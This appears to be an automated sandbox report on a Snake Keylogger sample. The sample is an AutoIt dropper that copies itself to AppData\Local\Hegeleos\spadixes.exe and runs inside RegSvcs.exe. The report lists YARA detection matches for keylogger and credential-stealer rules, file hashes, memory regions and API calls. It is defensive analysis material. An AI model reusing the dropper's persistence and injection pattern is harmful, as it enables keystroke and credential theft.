                Source: 00000003.00000002.3368516346.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: RubzLi27lr.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RubzLi27lr.exe, 00000000.00000000.2117780186.0000000000B72000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_be581c15-b
                Source: RubzLi27lr.exe, 00000000.00000003.2143032867.00000000040C1000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_d3cc4b03-c
                Source: spadixes.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: spadixes.exe, 00000002.00000000.2143304528.00000000009A2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_f26e27dc-5
                Source: spadixes.exe, 00000008.00000000.2305246647.00000000009A2000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_78af4dad-1
                Source: RubzLi27lr.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_f9d26a5a-c
                Source: spadixes.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_9bc85776-3
                Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1D5EB: CreateFileW,DeviceIoControl,CloseHandle | 0_2_00B1D5EB
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B11201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00B11201
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B1E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_00B1E8F6
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 2_2_0094E8F6
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB8060 | 0_2_00AB8060
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B22046 | 0_2_00B22046
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B18298 | 0_2_00B18298
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AEE4FF | 0_2_00AEE4FF
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AE676B | 0_2_00AE676B
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B44873 | 0_2_00B44873
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00ADCAA0 | 0_2_00ADCAA0
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00ABCAF0 | 0_2_00ABCAF0
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00ACCC39 | 0_2_00ACCC39
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AE6DD9 | 0_2_00AE6DD9
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB91C0 | 0_2_00AB91C0
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00ACB119 | 0_2_00ACB119
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD1394 | 0_2_00AD1394
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD781B | 0_2_00AD781B
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB7920 | 0_2_00AB7920
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AC997D | 0_2_00AC997D
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD7A4A | 0_2_00AD7A4A
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD7CA7 | 0_2_00AD7CA7
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AE9EEE | 0_2_00AE9EEE
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B3BE44 | 0_2_00B3BE44
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_0180F0E8 | 0_2_0180F0E8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00952046 | 2_2_00952046
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008E8060 | 2_2_008E8060
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00948298 | 2_2_00948298
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0091E4FF | 2_2_0091E4FF
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0091676B | 2_2_0091676B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00974873 | 2_2_00974873
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0090CAA0 | 2_2_0090CAA0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008ECAF0 | 2_2_008ECAF0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008FCC39 | 2_2_008FCC39
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00916DD9 | 2_2_00916DD9
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008E91C0 | 2_2_008E91C0
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008FB119 | 2_2_008FB119
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00901394 | 2_2_00901394
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0090781B | 2_2_0090781B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008E7920 | 2_2_008E7920
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_008F997D | 2_2_008F997D
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00907A4A | 2_2_00907A4A
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00907CA7 | 2_2_00907CA7
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00919EEE | 2_2_00919EEE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0096BE44 | 2_2_0096BE44
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_0139F628 | 2_2_0139F628
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DD278 | 3_2_029DD278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029D5362 | 3_2_029D5362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DA088 | 3_2_029DA088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DC146 | 3_2_029DC146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DC738 | 3_2_029DC738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DC468 | 3_2_029DC468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DCA08 | 3_2_029DCA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DE988 | 3_2_029DE988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029D69A0 | 3_2_029D69A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029D3E09 | 3_2_029D3E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DCFAB | 3_2_029DCFAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029D6FC8 | 3_2_029D6FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DCCD8 | 3_2_029DCCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029D29E0 | 3_2_029D29E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DE97B | 3_2_029DE97B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_029DF961 | 3_2_029DF961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F1E80 | 3_2_064F1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FE6B0 | 3_2_064FE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F17A0 | 3_2_064F17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FFC68 | 3_2_064FFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F9C70 | 3_2_064F9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F9548 | 3_2_064F9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F0B30 | 3_2_064F0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F5028 | 3_2_064F5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F2968 | 3_2_064F2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F1E70 | 3_2_064F1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FDE00 | 3_2_064FDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FE6AE | 3_2_064FE6AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FEF51 | 3_2_064FEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FEF60 | 3_2_064FEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F178F | 3_2_064F178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FCCA0 | 3_2_064FCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FD540 | 3_2_064FD540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FD550 | 3_2_064FD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FDDFE | 3_2_064FDDFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FE24A | 3_2_064FE24A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FE258 | 3_2_064FE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FEAF8 | 3_2_064FEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FEB08 | 3_2_064FEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F9328 | 3_2_064F9328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F0B20 | 3_2_064F0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F9BFA | 3_2_064F9BFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F8B91 | 3_2_064F8B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F8BA0 | 3_2_064F8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FF3B8 | 3_2_064FF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F0040 | 3_2_064F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F0006 | 3_2_064F0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FF802 | 3_2_064FF802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064F5018 | 3_2_064F5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FF810 | 3_2_064FF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FD0F8 | 3_2_064FD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FD999 | 3_2_064FD999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_064FD9A8 | 3_2_064FD9A8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 8_2_017BF158 | 8_2_017BF158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158C146 | 9_2_0158C146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01587118 | 9_2_01587118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158A088 | 9_2_0158A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01585362 | 9_2_01585362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158D278 | 9_2_0158D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158C468 | 9_2_0158C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158C738 | 9_2_0158C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158E988 | 9_2_0158E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015869A0 | 9_2_015869A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01583B95 | 9_2_01583B95
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158CA08 | 9_2_0158CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158CCD8 | 9_2_0158CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158CFA9 | 9_2_0158CFA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01583E09 | 9_2_01583E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158E97A | 9_2_0158E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0158F961 | 9_2_0158F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_015829EC | 9_2_015829EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01583AA1 | 9_2_01583AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A91E80 | 9_2_06A91E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A9E258 | 9_2_06A9E258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A917A0 | 9_2_06A917A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A99328 | 9_2_06A99328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A90B30 | 9_2_06A90B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A95028 | 9_2_06A95028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06A99C18 | 9_2_06A99C18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9FC689_2_06A9FC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A929689_2_06A92968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E6A09_2_06A9E6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E6B09_2_06A9E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EAF89_2_06A9EAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9DE009_2_06A9DE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A91E709_2_06A91E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9E24A9_2_06A9E24A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A98BA09_2_06A98BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F3B89_2_06A9F3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9178F9_2_06A9178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A90B209_2_06A90B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EB089_2_06A9EB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EF609_2_06A9EF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9EF519_2_06A9EF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9CCA09_2_06A9CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D0E99_2_06A9D0E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D0F89_2_06A9D0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F8029_2_06A9F802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A900069_2_06A90006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A950189_2_06A95018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9F8109_2_06A9F810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A900409_2_06A90040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D9A89_2_06A9D9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D9999_2_06A9D999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9DDFF9_2_06A9DDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A995489_2_06A99548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D5409_2_06A9D540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06A9D5509_2_06A9D550
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: String function: 00AB9CB3 appears 31 times
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: String function: 00AD0A30 appears 46 times
                Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: String function: 00ACF9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: String function: 008FF9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: String function: 00900A30 appears 46 times
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: String function: 008E9CB3 appears 31 times
                Source: RubzLi27lr.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
